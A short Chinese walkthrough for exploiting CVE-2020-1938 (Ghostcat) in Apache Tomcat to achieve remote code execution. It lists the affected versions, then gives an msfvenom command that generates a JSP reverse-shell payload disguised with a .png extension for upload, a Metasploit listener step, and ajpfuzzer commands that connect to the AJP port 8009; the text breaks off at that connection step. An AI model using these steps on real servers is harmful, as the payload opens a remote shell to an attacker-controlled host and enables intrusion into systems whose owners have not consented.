CVE-2020-1938 幽灵猫漏洞RCE

2月20日，国家信息安全漏洞共享平台（CNVD）发布了Apache Tomcat文件包含漏洞（CNVD-2020-10487/CVE-2020-1938）。该漏洞是由于Tomcat AJP协议存在缺陷而导致，攻击者利用该漏洞可通过构造特定参数，读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能，攻击者可进一步实现远程代码执行。目前，厂商已发布新版本完成漏洞修复。

漏洞详情请查看 Apache Tomcat文件包含漏洞通告（附poc）

存在此漏洞Tomcat版本：

7.*分支7.0.100之前版本
8.*分支8.5.51之前版本
9.*分支9.0.31之前版本

此处只表RCE方式。

msf生成反弹马，监听

首先使用msf生成反弹shell马，为方便上传之用直接生成为.png后缀：

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.211.55.5 LPORT=999 R >ma.png

在msf监听

木马执行

放入项目目录，此处假设目标机图片上传路径为/t/22

下载AJP包构造器ajpfuzzer

运行 java -jar ajpfuzzer_v0.6.jar

连接目标端口 connect 127.0.0.1 8009